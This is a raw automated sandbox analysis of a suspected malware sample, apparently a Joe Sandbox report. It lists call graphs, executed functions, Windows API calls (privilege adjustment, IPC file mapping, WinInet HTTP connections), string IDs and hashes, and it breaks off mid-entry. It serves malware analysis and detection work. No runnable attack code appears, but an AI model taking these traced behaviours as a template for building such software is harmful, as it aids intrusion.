100297->100273 100298 1116970d 100299 1116971d 100298->100299 100300 11169718 100298->100300 100304 11169617 100299->100304 100316 11177075 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 100300->100316 100303 1116972b 100305 11169623 __fsopen 100304->100305 100306 11169670 100305->100306 100314 111696c0 __fsopen 100305->100314 100317 111694b3 100305->100317 100306->100314 100367 11025e20 100306->100367 100308 11169683 100310 111696a0 100308->100310 100311 11025e20 ___DllMainCRTStartup 7 API calls 100308->100311 100312 111694b3 __CRT_INIT@12 149 API calls 100310->100312 100310->100314 100313 11169697 100311->100313 100312->100314 100315 111694b3 __CRT_INIT@12 149 API calls 100313->100315 100314->100303 100315->100310 100316->100299 100318 111694bf __fsopen 100317->100318 100319 111694c7 100318->100319 100320 11169541 100318->100320 100376 1116d4d0 HeapCreate 100319->100376 100322 11169547 100320->100322 100323 111695a2 100320->100323 100328 11169565 100322->100328 100335 111694d0 __fsopen 100322->100335 100464 1116d79b 66 API calls _doexit 100322->100464 100324 111695a7 100323->100324 100325 11169600 100323->100325 100327 1116b5fa ___set_flsgetvalue 3 API calls 100324->100327 100325->100335 100470 1116b8fe 79 API calls __freefls@4 100325->100470 100326 111694cc 100326->100335 100377 1116b96c GetModuleHandleW 100326->100377 100330 111695ac 100327->100330 100333 11169579 100328->100333 100465 1117140e 67 API calls _free 100328->100465 100336 11169dbe __calloc_crt 66 API calls 100330->100336 100468 1116958c 70 API calls __mtterm 100333->100468 100335->100306 100339 111695b8 100336->100339 100337 111694dc __RTC_Initialize 100340 111694e0 100337->100340 100346 111694ec GetCommandLineA 100337->100346 100339->100335 100342 111695c4 DecodePointer 100339->100342 100461 1116d4ee HeapDestroy 100340->100461 100341 1116956f 100466 1116b64b 70 API calls _free 100341->100466 100348 111695d9 100342->100348 100345 11169574 100467 1116d4ee HeapDestroy 100345->100467 100402 11176f92 GetEnvironmentStringsW 100346->100402 100351 111695f4 100348->100351 100352 111695dd 100348->100352 100353 11162be5 _free 66 API calls 100351->100353 100469 1116b688 66 API calls 4 library calls 100352->100469 100353->100335 100357 111695e4 GetCurrentThreadId 100357->100335 100358 1116950a 100462 1116b64b 70 API calls _free 100358->100462 100362 1116952a 100362->100335 100463 1117140e 67 API calls _free 100362->100463 100368 1110f7d0 100367->100368 100369 1110f7f1 100368->100369 100370 1110f7dc 100368->100370 100371 1110f804 ___DllMainCRTStartup 100368->100371 100487 1110f720 100369->100487 100370->100371 100373 1110f720 ___DllMainCRTStartup 7 API calls 100370->100373 100371->100308 100375 1110f7e5 100373->100375 100374 1110f7f8 100374->100308 100375->100308 100376->100326 100378 1116b980 100377->100378 100379 1116b989 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 100377->100379 100471 1116b64b 70 API calls _free 100378->100471 100381 1116b9d3 TlsAlloc 100379->100381 100384 1116bae2 100381->100384 100385 1116ba21 TlsSetValue 100381->100385 100382 1116b985 100382->100337 100384->100337 100385->100384 100386 1116ba32 100385->100386 100472 1116d557 EncodePointer EncodePointer __init_pointers ___crtMessageBoxW __initp_misc_winsig 100386->100472 100388 1116ba37 EncodePointer EncodePointer EncodePointer EncodePointer 100473 111735c2 InitializeCriticalSectionAndSpinCount 100388->100473 100390 1116ba76 100391 1116badd 100390->100391 100392 1116ba7a DecodePointer 100390->100392 100475 1116b64b 70 API calls _free 100391->100475 100394 1116ba8f 100392->100394 100394->100391 100395 11169dbe __calloc_crt 66 API calls 100394->100395 100396 1116baa5 100395->100396 100396->100391 100397 1116baad DecodePointer 100396->100397 100398 1116babe 100397->100398 100398->100391 100399 1116bac2 100398->100399 100474 1116b688 66 API calls 4 library calls 100399->100474 100401 1116baca GetCurrentThreadId 100401->100384 100403 11176fae WideCharToMultiByte 100402->100403 100407 111694fc 100402->100407 100405 11176fe3 100403->100405 100406 1117701b FreeEnvironmentStringsW 100403->100406 100408 11169d79 __malloc_crt 66 API calls 100405->100408 100406->100407 100415 111711c9 GetStartupInfoW 100407->100415 100409 11176fe9 100408->100409 100409->100406 100410 11176ff1 WideCharToMultiByte 100409->100410 100411 11177003 100410->100411 100412 1117700f FreeEnvironmentStringsW 100410->100412 100413 11162be5 _free 66 API calls 100411->100413 100412->100407 100414 1117700b 100413->100414 100414->100412 100416 11169dbe __calloc_crt 66 API calls 100415->100416 100427 111711e7 100416->100427 100417 11171392 GetStdHandle 100422 1117135c 100417->100422 100418 11169dbe __calloc_crt 66 API calls 100418->100427 100419 111713f6 SetHandleCount 100426 11169506 100419->100426 100420 111713a4 GetFileType 100420->100422 100421 111712dc 100421->100422 100423 11171313 InitializeCriticalSectionAndSpinCount 100421->100423 100424 11171308 GetFileType 100421->100424 100422->100417 100422->100419 100422->100420 100425 111713ca InitializeCriticalSectionAndSpinCount 100422->100425 100423->100421 100423->100426 100424->100421 100424->100423 100425->100422 100425->100426 100426->100358 100428 11176ed7 100426->100428 100427->100418 100427->100421 100427->100422 100427->100426 100427->100427 100429 11176ef1 GetModuleFileNameA 100428->100429 100430 11176eec 100428->100430 100432 11176f18 100429->100432 100482 11170be7 94 API calls __setmbcp 100430->100482 100476 11176d3d 100432->100476 100435 11169d79 __malloc_crt 66 API calls 100436 11176f5a 100435->100436 100437 11176d3d _parse_cmdline 76 API calls 100436->100437 100438 11169516 100436->100438 100437->100438 100438->100362 100439 11176c61 100438->100439 100440 11176c6a 100439->100440 100444 11176c6f _strlen 100439->100444 100484 11170be7 94 API calls __setmbcp 100440->100484 100442 1116951f 100442->100362 100455 1116d5ae 100442->100455 100443 11169dbe __calloc_crt 66 API calls 100446 11176ca4 _strlen 100443->100446 100444->100442 100444->100443 100445 11176cf3 100447 11162be5 _free 66 API calls 100445->100447 100446->100442 100446->100445 100448 11169dbe __calloc_crt 66 API calls 100446->100448 100449 11176d19 100446->100449 100451 1116be9f _strcpy_s 66 API calls 100446->100451 100452 11176d30 100446->100452 100447->100442 100448->100446 100450 11162be5 _free 66 API calls 100449->100450 100450->100442 100451->100446 100453 1116deb2 __invoke_watson 10 API calls 100452->100453 100454 11176d3c 100453->100454 100456 1116d5bc __IsNonwritableInCurrentImage 100455->100456 100485 1116c9cb EncodePointer 100456->100485 100458 1116d5da __initterm_e 100460 1116d5fb __IsNonwritableInCurrentImage 100458->100460 100486 11162f15 76 API calls __cinit 100458->100486 100460->100362 100461->100335 100462->100340 100463->100358 100464->100328 100465->100341 100466->100345 100467->100333 100468->100335 100469->100357 100470->100335 100471->100382 100472->100388 100473->100390 100474->100401 100475->100384 100478 11176d5c 100476->100478 100480 11176dc9 100478->100480 100483 111766ce 76 API calls x_ismbbtype_l 100478->100483 100479 11176ec7 100479->100435 100479->100438 100480->100479 100481 111766ce 76 API calls _parse_cmdline 100480->100481 100481->100480 100482->100429 100483->100478 100484->100444 100485->100458 100486->100460 100488 1110f764 EnterCriticalSection 100487->100488 100489 1110f74f InitializeCriticalSection 100487->100489 100490 1110f785 100488->100490 100489->100488 100491 1110f7b3 LeaveCriticalSection 100490->100491 100492 1110f6c0 ___DllMainCRTStartup 4 API calls 100490->100492 100491->100374 100492->100490 100493 6c5d63a0 100498 6c5d6350 100493->100498 100496 6c5d63a9 WSACancelBlockingCall 100497 6c5d63b1 Sleep 100499 6c5d638d 100498->100499 100500 6c5f28e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 100499->100500 100501 6c5d6397 100500->100501 100501->100496 100501->100497

                                                                                      Executed Functions

                                                                                      Function 1109E190 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501filethreadmemoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 716 1109e190-1109e1f2 call 1109d980 719 1109e1f8-1109e21b call 1109d440 716->719 720 1109e810 716->720 726 1109e221-1109e235 LocalAlloc 719->726 727 1109e384-1109e386 719->727 722 1109e812-1109e82d call 11161d01 720->722 728 1109e23b-1109e26d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 726->728 729 1109e805-1109e80b call 1109d4d0 726->729 730 1109e316-1109e33b CreateFileMappingA 727->730 733 1109e2fa-1109e310 728->733 734 1109e273-1109e29e call 1109d3a0 call 1109d3f0 728->734 729->720 731 1109e388-1109e39b GetLastError 730->731 732 1109e33d-1109e35d GetLastError call 1112ef20 730->732 738 1109e39d 731->738 739 1109e3a2-1109e3b9 MapViewOfFile 731->739 747 1109e368-1109e370 732->747 748 1109e35f-1109e366 LocalFree 732->748 733->730 765 1109e2e9-1109e2f1 734->765 766 1109e2a0-1109e2d6 GetSecurityDescriptorSacl 734->766 738->739 740 1109e3bb-1109e3d6 call 1112ef20 739->740 741 1109e3f7-1109e3ff 739->741 759 1109e3d8-1109e3d9 LocalFree 740->759 760 1109e3db-1109e3e3 740->760 745 1109e4a1-1109e4b3 741->745 746 1109e405-1109e41e GetModuleFileNameA 741->746 751 1109e4f9-1109e512 call 11161d20 GetTickCount 745->751 752 1109e4b5-1109e4b8 745->752 753 1109e4bd-1109e4d8 call 1112ef20 746->753 754 1109e424-1109e42d 746->754 755 1109e372-1109e373 LocalFree 747->755 756 1109e375-1109e37f 747->756 748->747 777 1109e514-1109e519 751->777 761 1109e59f-1109e603 GetCurrentProcessId GetModuleFileNameA call 1109d810 752->761 781 1109e4da-1109e4db LocalFree 753->781 782 1109e4dd-1109e4e5 753->782 754->753 762 1109e433-1109e436 754->762 755->756 764 1109e7fe-1109e800 call 1109d8c0 756->764 759->760 770 1109e3e8-1109e3f2 760->770 771 1109e3e5-1109e3e6 LocalFree 760->771 786 1109e60b-1109e622 CreateEventA 761->786 787 1109e605 761->787 773 1109e479-1109e49c call 1112ef20 call 1109d8c0 762->773 774 1109e438-1109e43c 762->774 764->729 765->733 768 1109e2f3-1109e2f4 FreeLibrary 765->768 766->765 767 1109e2d8-1109e2e3 SetSecurityDescriptorSacl 766->767 767->765 768->733 770->764 771->770 773->745 774->773 780 1109e43e-1109e449 774->780 783 1109e51b-1109e52a 777->783 784 1109e52c 777->784 788 1109e450-1109e454 780->788 781->782 789 1109e4ea-1109e4f4 782->789 790 1109e4e7-1109e4e8 LocalFree 782->790 783->777 783->784 791 1109e52e-1109e534 784->791 795 1109e624-1109e643 GetLastError * 2 call 1112ef20 786->795 796 1109e646-1109e64e 786->796 787->786 793 1109e470-1109e472 788->793 794 1109e456-1109e458 788->794 789->764 790->789 801 1109e545-1109e59d 791->801 802 1109e536-1109e543 791->802 798 1109e475-1109e477 793->798 803 1109e45a-1109e460 794->803 804 1109e46c-1109e46e 794->804 795->796 799 1109e650 796->799 800 1109e656-1109e667 CreateEventA 796->800 798->753 798->773 799->800 807 1109e669-1109e688 GetLastError * 2 call 1112ef20 800->807 808 1109e68b-1109e693 800->808 801->761 802->791 802->801 803->793 805 1109e462-1109e46a 803->805 804->798 805->788 805->804 807->808 810 1109e69b-1109e6ad CreateEventA 808->810 811 1109e695 808->811 813 1109e6af-1109e6ce GetLastError * 2 call 1112ef20 810->813 814 1109e6d1-1109e6d9 810->814 811->810 813->814 816 1109e6db 814->816 817 1109e6e1-1109e6f2 CreateEventA 814->817 816->817 818 1109e714-1109e722 817->818 819 1109e6f4-1109e711 GetLastError * 2 call 1112ef20 817->819 822 1109e724-1109e725 LocalFree 818->822 823 1109e727-1109e72f 818->823 819->818 822->823 825 1109e731-1109e732 LocalFree 823->825 826 1109e734-1109e73d 823->826 825->826 827 1109e743-1109e746 826->827 828 1109e7e7-1109e7f9 call 1112ef20 826->828 827->828 830 1109e74c-1109e74f 827->830 828->764 830->828 832 1109e755-1109e758 830->832 832->828 833 1109e75e-1109e761 832->833 834 1109e76c-1109e788 CreateThread 833->834 835 1109e763-1109e769 GetCurrentThreadId 833->835 836 1109e78a-1109e794 834->836 837 1109e796-1109e7a0 834->837 835->834 836->764 838 1109e7ba-1109e7e5 SetEvent call 1112ef20 call 1109d4d0 837->838 839 1109e7a2-1109e7b8 ResetEvent * 3 837->839 838->722 839->838
                                                                                      APIs
                                                                                        • Part of subcall function 1109D440: GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,A1BC2D8B,00080000,00000000,00000000), ref: 1109D46D
                                                                                        • Part of subcall function 1109D440: OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                        • Part of subcall function 1109D440: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                        • Part of subcall function 1109D440: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                      • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,A1BC2D8B,00080000,00000000,00000000), ref: 1109E225
                                                                                      • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E23E
                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E249
                                                                                      • GetVersionExA.KERNEL32(?), ref: 1109E260
                                                                                      • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2CE
                                                                                      • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E2E3
                                                                                      • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2F4
                                                                                      • CreateFileMappingA.KERNEL32(000000FF,11030063,00000004,00000000,?,?), ref: 1109E330
                                                                                      • GetLastError.KERNEL32 ref: 1109E33D
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E366
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E373
                                                                                      • GetLastError.KERNEL32 ref: 1109E390
                                                                                      • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E3AE
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E3D9
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E3E6
                                                                                        • Part of subcall function 1109D3A0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E27E), ref: 1109D3A8
                                                                                        • Part of subcall function 1109D3F0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E412
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E4DB
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E4E8
                                                                                      • _memset.LIBCMT ref: 1109E500
                                                                                      • GetTickCount.KERNEL32 ref: 1109E508
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 1109E5B4
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E5CF
                                                                                      • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109E61B
                                                                                      • GetLastError.KERNEL32 ref: 1109E624
                                                                                      • GetLastError.KERNEL32(00000000), ref: 1109E62B
                                                                                      • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E660
                                                                                      • GetLastError.KERNEL32 ref: 1109E669
                                                                                      • GetLastError.KERNEL32(00000000), ref: 1109E670
                                                                                      • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109E6A6
                                                                                      • GetLastError.KERNEL32 ref: 1109E6AF
                                                                                      • GetLastError.KERNEL32(00000000), ref: 1109E6B6
                                                                                      • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E6EB
                                                                                      • GetLastError.KERNEL32 ref: 1109E6FA
                                                                                      • GetLastError.KERNEL32(00000000), ref: 1109E6FD
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E725
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E732
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 1109E763
                                                                                      • CreateThread.KERNEL32(00000000,00002000,Function_0009DD20,00000000,00000000,00000030), ref: 1109E77D
                                                                                      • ResetEvent.KERNEL32(?), ref: 1109E7AC
                                                                                      • ResetEvent.KERNEL32(?), ref: 1109E7B2
                                                                                      • ResetEvent.KERNEL32(?), ref: 1109E7B8
                                                                                      • SetEvent.KERNEL32(?), ref: 1109E7BE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                      • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                      • API String ID: 3291243470-2792520954
                                                                                      • Opcode ID: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                      • Instruction ID: e0f3534def007632db5cc521867dfefedb1bc63d92e862916d16df31d0e36df5
                                                                                      • Opcode Fuzzy Hash: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                      • Instruction Fuzzy Hash: 221282B590026D9FE724DF61CCD4EAEF7BABB88308F0049A9E11997244D771AD84CF51
                                                                                      Function 11029590 Relevance: 89.8, APIs: 39, Strings: 12, Instructions: 534libraryloadernetworkCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 844 11029590-1102961e LoadLibraryA 845 11029621-11029626 844->845 846 11029628-1102962b 845->846 847 1102962d-11029630 845->847 848 11029645-1102964a 846->848 849 11029632-11029635 847->849 850 11029637-11029642 847->850 851 11029679-11029685 848->851 852 1102964c-11029651 848->852 849->848 850->848 855 1102972a-1102972d 851->855 856 1102968b-11029697 call 11162b51 851->856 853 11029653-1102966a GetProcAddress 852->853 854 1102966c-1102966f InternetCloseHandle 852->854 853->854 857 11029671-11029673 SetLastError 853->857 854->851 859 11029748-11029760 InternetOpenA 855->859 860 1102972f-11029746 GetProcAddress 855->860 861 1102969c-110296a3 856->861 857->851 863 11029784-11029790 call 11162be5 859->863 860->859 862 11029779-11029781 SetLastError 860->862 864 110296c4-110296d0 861->864 865 110296a5-110296be GetProcAddress 861->865 862->863 869 11029796-110297c7 call 11142290 call 11164390 863->869 870 11029a0a-11029a14 863->870 872 110296d2-110296db GetLastError 864->872 875 110296f1-110296f3 864->875 865->864 867 11029762-1102976a SetLastError 865->867 867->872 894 110297c9-110297cc 869->894 895 110297cf-110297e4 call 11081a70 * 2 869->895 870->845 874 11029a1a 870->874 872->875 876 110296dd-110296ef call 11162be5 call 11162b51 872->876 878 11029a2c-11029a2f 874->878 879 11029710-1102971c 875->879 880 110296f5-1102970e GetProcAddress 875->880 876->875 884 11029a31-11029a36 878->884 885 11029a3b-11029a3e 878->885 879->855 898 1102971e-11029727 879->898 880->879 883 1102976f-11029777 SetLastError 880->883 883->855 889 11029b9f-11029ba7 884->889 890 11029a40-11029a45 885->890 891 11029a4a 885->891 896 11029bb0-11029bc3 889->896 897 11029ba9-11029baa FreeLibrary 889->897 899 11029b6f-11029b74 890->899 900 11029a4d-11029a55 891->900 894->895 918 110297e6-110297ea 895->918 919 110297ed-110297f9 895->919 897->896 898->855 904 11029b76-11029b8d GetProcAddress 899->904 905 11029b8f-11029b95 899->905 902 11029a57-11029a6e GetProcAddress 900->902 903 11029a74-11029a7d 900->903 902->903 908 11029b2e-11029b30 SetLastError 902->908 912 11029a80-11029a82 903->912 904->905 906 11029b97-11029b99 SetLastError 904->906 905->889 906->889 910 11029b36-11029b3d 908->910 913 11029b4c-11029b6d call 110278a0 * 2 910->913 912->910 915 11029a88-11029a8d 912->915 913->899 915->913 916 11029a93-11029acf call 1110f4a0 call 11027850 915->916 941 11029ae1-11029ae3 916->941 942 11029ad1-11029ad4 916->942 918->919 922 11029824-11029829 919->922 923 110297fb-110297fd 919->923 925 1102982b-1102983c GetProcAddress 922->925 926 1102983e-11029855 InternetConnectA 922->926 928 11029814-1102981a 923->928 929 110297ff-11029812 GetProcAddress 923->929 925->926 931 11029881-1102988c SetLastError 925->931 932 110299f7-11029a07 call 111618c1 926->932 933 1102985b-1102985e 926->933 928->922 929->928 935 1102981c-1102981e SetLastError 929->935 931->932 932->870 938 11029860-11029862 933->938 939 11029899-110298a1 933->939 935->922 943 11029864-11029877 GetProcAddress 938->943 944 11029879-1102987f 938->944 945 110298a3-110298b7 GetProcAddress 939->945 946 110298b9-110298d4 939->946 950 11029ae5 941->950 951 11029aec-11029af1 941->951 942->941 949 11029ad6-11029ada 942->949 943->944 952 11029891-11029893 SetLastError 943->952 944->939 945->946 948 110298d6-110298de SetLastError 945->948 954 110298e1-110298e4 946->954 948->954 949->941 955 11029adc 949->955 950->951 956 11029af3-11029b09 call 110d1090 951->956 957 11029b0c-11029b0e 951->957 952->939 959 110299f2-110299f5 954->959 960 110298ea-110298ef 954->960 955->941 956->957 962 11029b10-11029b12 957->962 963 11029b14-11029b25 call 111618c1 957->963 959->932 968 11029a1c-11029a29 call 111618c1 959->968 966 110298f1-11029908 GetProcAddress 960->966 967 1102990a-11029916 960->967 962->963 964 11029b3f-11029b49 call 111618c1 962->964 963->913 974 11029b27-11029b29 963->974 964->913 966->967 973 11029918-11029920 SetLastError 966->973 978 11029922-1102993b GetLastError 967->978 968->878 973->978 974->900 979 11029956-1102996b 978->979 980 1102993d-11029954 GetProcAddress 978->980 982 11029975-11029983 GetLastError 979->982 980->979 981 1102996d-1102996f SetLastError 980->981 981->982 984 11029985-1102998a 982->984 985 1102998c-11029998 GetDesktopWindow 982->985 984->985 986 110299e2-110299e7 984->986 987 110299b3-110299cf 985->987 988 1102999a-110299b1 GetProcAddress 985->988 986->959 990 110299e9-110299ef 986->990 987->959 992 110299d1 987->992 988->987 989 110299d6-110299e0 SetLastError 988->989 989->959 990->959 992->954
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(WinInet.dll,A1BC2D8B,74DF23A0,?,00000000), ref: 110295C5
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102965F
                                                                                      • InternetCloseHandle.WININET(000000FF), ref: 1102966D
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029673
                                                                                      • _malloc.LIBCMT ref: 11029697
                                                                                      • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110296B1
                                                                                      • GetLastError.KERNEL32 ref: 110296D2
                                                                                      • _free.LIBCMT ref: 110296DE
                                                                                      • _malloc.LIBCMT ref: 110296E7
                                                                                      • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029701
                                                                                      • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102973B
                                                                                      • InternetOpenA.WININET(11194244,?,?,000000FF,00000000), ref: 1102975A
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029764
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029771
                                                                                      • SetLastError.KERNEL32(00000078), ref: 1102977B
                                                                                      • _free.LIBCMT ref: 11029785
                                                                                        • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                        • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029805
                                                                                      • SetLastError.KERNEL32(00000078), ref: 1102981E
                                                                                      • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029831
                                                                                      • InternetConnectA.WININET(000000FF,11199690,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1102984E
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102986A
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029883
                                                                                      • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 110298A9
                                                                                      • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 110298FD
                                                                                      • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029A63
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029B30
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029B82
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029B99
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11029BAA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ErrorLast$Internet$FreeLibrary_free_malloc$CloseConnectHandleHeapLoadOpen
                                                                                      • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                      • API String ID: 3053051410-913974648
                                                                                      • Opcode ID: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
                                                                                      • Instruction ID: e81a0880bf89439be6f70403065d0babe3f5b16467f55efefddb7e1ac6149969
                                                                                      • Opcode Fuzzy Hash: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
                                                                                      • Instruction Fuzzy Hash: 5E127FB0D04269EBEB11CFA9CC88A9EFBF9FF88754F604569E465E7240E7705940CB60
                                                                                      Function 6C5E7030 Relevance: 89.7, APIs: 21, Strings: 30, Instructions: 406threadlibrarysynchronizationCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
